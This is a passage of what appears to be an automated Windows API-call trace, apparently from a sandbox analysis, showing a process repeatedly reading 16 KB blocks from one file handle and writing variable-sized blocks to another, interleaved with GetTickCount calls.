lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xdd5, lpOverlapped=0x0) returned 1 [0272.703] GetTickCount () returned 0x1d61308 [0272.703] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.704] GetTickCount () returned 0x1d61308 [0272.704] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.705] GetTickCount () returned 0x1d61308 [0272.705] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x74, lpOverlapped=0x0) returned 1 [0272.705] GetTickCount () returned 0x1d61308 [0272.705] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.705] GetTickCount () returned 0x1d61308 [0272.705] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.707] GetTickCount () returned 0x1d61308 [0272.707] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2a14, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2a14, lpOverlapped=0x0) returned 1 [0272.707] GetTickCount () returned 0x1d61308 [0272.707] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.708] GetTickCount () returned 0x1d61308 [0272.708] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7bc2, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7bc2, lpOverlapped=0x0) returned 1 [0272.708] GetTickCount () returned 0x1d61308 [0272.708] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.709] GetTickCount () returned 0x1d61308 [0272.709] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x79a1, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x79a1, lpOverlapped=0x0) returned 1 [0272.710] GetTickCount () returned 0x1d61308 [0272.710] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.710] GetTickCount () returned 0x1d61318 [0272.710] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x73b1, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x73b1, lpOverlapped=0x0) returned 1 [0272.711] GetTickCount () returned 0x1d61318 [0272.711] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.711] GetTickCount () returned 0x1d61318 [0272.711] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.712] GetTickCount () returned 0x1d61318 [0272.712] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x170d, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x170d, lpOverlapped=0x0) returned 1 [0272.712] GetTickCount () returned 0x1d61318 [0272.712] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.713] GetTickCount () returned 0x1d61318 [0272.713] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7e2b, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7e2b, lpOverlapped=0x0) returned 1 [0272.714] GetTickCount () returned 0x1d61318 [0272.714] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.714] GetTickCount () returned 0x1d61318 [0272.714] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.715] GetTickCount () returned 0x1d61318 [0272.715] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1a0c, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1a0c, lpOverlapped=0x0) returned 1 [0272.715] GetTickCount () returned 0x1d61318 [0272.715] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.716] GetTickCount () returned 0x1d61318 [0272.716] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.716] GetTickCount () returned 0x1d61318 [0272.716] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xa8, lpOverlapped=0x0) returned 1 [0272.717] GetTickCount () returned 0x1d61318 [0272.717] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.717] GetTickCount () returned 0x1d61318 [0272.717] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.719] GetTickCount () returned 0x1d61318 [0272.719] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x552f, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x552f, lpOverlapped=0x0) returned 1 [0272.719] GetTickCount () returned 0x1d61318 [0272.719] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.720] GetTickCount () returned 0x1d61318 [0272.720] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.720] GetTickCount () returned 0x1d61318 [0272.720] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.721] GetTickCount () returned 0x1d61318 [0272.721] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2efd, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2efd, lpOverlapped=0x0) returned 1 [0272.721] GetTickCount () returned 0x1d61318 [0272.721] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.722] GetTickCount () returned 0x1d61318 [0272.722] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.723] GetTickCount () returned 0x1d61318 [0272.723] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2e96, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2e96, lpOverlapped=0x0) returned 1 [0272.723] GetTickCount () returned 0x1d61318 [0272.723] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.724] GetTickCount () returned 0x1d61318 [0272.724] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.724] GetTickCount () returned 0x1d61318 [0272.724] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2795, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2795, lpOverlapped=0x0) returned 1 [0272.725] GetTickCount () returned 0x1d61318 [0272.725] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.725] GetTickCount () returned 0x1d61318 [0272.725] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.773] GetTickCount () returned 0x1d61356 [0272.773] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x4509, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x4509, lpOverlapped=0x0) returned 1 [0272.775] GetTickCount () returned 0x1d61356 [0272.775] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.776] GetTickCount () returned 0x1d61356 [0272.776] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.777] GetTickCount () returned 0x1d61356 [0272.777] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xa75, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xa75, lpOverlapped=0x0) returned 1 [0272.777] GetTickCount () returned 0x1d61356 [0272.777] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.777] GetTickCount () returned 0x1d61356 [0272.777] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.778] GetTickCount () returned 0x1d61356 [0272.778] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0xc72, lpOverlapped=0x0) returned 1 [0272.778] GetTickCount () returned 0x1d61356 [0272.778] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.779] GetTickCount () returned 0x1d61356 [0272.779] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.780] GetTickCount () returned 0x1d61356 [0272.780] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x691, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x691, lpOverlapped=0x0) returned 1 [0272.780] GetTickCount () returned 0x1d61356 [0272.780] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.780] GetTickCount () returned 0x1d61356 [0272.780] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x7434, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x7434, lpOverlapped=0x0) returned 1 [0272.781] GetTickCount () returned 0x1d61356 [0272.781] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.781] GetTickCount () returned 0x1d61356 [0272.781] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x724b, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x724b, lpOverlapped=0x0) returned 1 [0272.782] GetTickCount () returned 0x1d61356 [0272.782] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.783] GetTickCount () returned 0x1d61356 [0272.783] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.783] GetTickCount () returned 0x1d61356 [0272.783] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x21b, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x21b, lpOverlapped=0x0) returned 1 [0272.783] GetTickCount () returned 0x1d61356 [0272.783] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.784] GetTickCount () returned 0x1d61356 [0272.784] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.785] GetTickCount () returned 0x1d61356 [0272.785] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x1a20, lpOverlapped=0x0) returned 1 [0272.785] GetTickCount () returned 0x1d61356 [0272.785] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.785] GetTickCount () returned 0x1d61356 [0272.785] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.791] GetTickCount () returned 0x1d61366 [0272.791] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x2098, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x2098, lpOverlapped=0x0) returned 1 [0272.791] GetTickCount () returned 0x1d61366 [0272.791] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.792] GetTickCount () returned 0x1d61366 [0272.792] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.792] GetTickCount () returned 0x1d61366 [0272.792] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x30ac, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x30ac, lpOverlapped=0x0) returned 1 [0272.793] GetTickCount () returned 0x1d61366 [0272.793] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.793] GetTickCount () returned 0x1d61366 [0272.793] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.794] GetTickCount () returned 0x1d61366 [0272.794] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x3494, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x3494, lpOverlapped=0x0) returned 1 [0272.794] GetTickCount () returned 0x1d61366 [0272.794] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.795] GetTickCount () returned 0x1d61366 [0272.795] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.796] GetTickCount () returned 0x1d61366 [0272.796] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x184d, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x184d, lpOverlapped=0x0) returned 1 [0272.796] GetTickCount () returned 0x1d61366 [0272.796] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.796] GetTickCount () returned 0x1d61366 [0272.796] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.797] GetTickCount () returned 0x1d61366 [0272.797] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x31fe, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x31fe, lpOverlapped=0x0) returned 1 [0272.797] GetTickCount () returned 0x1d61366 [0272.798] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.798] GetTickCount () returned 0x1d61366 [0272.798] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.799] GetTickCount () returned 0x1d61366 [0272.799] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x941, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x941, lpOverlapped=0x0) returned 1 [0272.799] GetTickCount () returned 0x1d61366 [0272.799] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.800] GetTickCount () returned 0x1d61366 [0272.800] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.801] GetTickCount () returned 0x1d61366 [0272.801] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x6bc8, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x6bc8, lpOverlapped=0x0) returned 1 [0272.801] GetTickCount () returned 0x1d61366 [0272.801] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.802] GetTickCount () returned 0x1d61366 [0272.802] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.803] GetTickCount () returned 0x1d61366 [0272.803] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x4e9d, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x4e9d, lpOverlapped=0x0) returned 1 [0272.803] GetTickCount () returned 0x1d61366 [0272.803] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d6fd28, lpOverlapped=0x0 | out: lpBuffer=0x415420*, lpNumberOfBytesRead=0x2d6fd28*=0x4000, lpOverlapped=0x0) returned 1 [0272.804] GetTickCount () returned 0x1d61375 [0272.804] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x8000, lpOverlapped=0x0) returned 1 [0272.805] GetTickCount () returned 0x1d61375 [0272.805] WriteFile (in: hFile=0x1c, lpBuffer=0x419420*, nNumberOfBytesToWrite=0x20ef, lpNumberOfBytesWritten=0x2d6fd34, lpOverlapped=0x0 | out: lpBuffer=0x419420*, lpNumberOfBytesWritten=0x2d6fd34*=0x20ef, lpOverlapped=0x0) returned 1 [0272.805] GetTickCount () returned 0x1d61375 [0272.805] ReadFile (in: hFile=0x1e0, lpBuffer=0x415420, nNumberOfBytesToRead=0x4000, 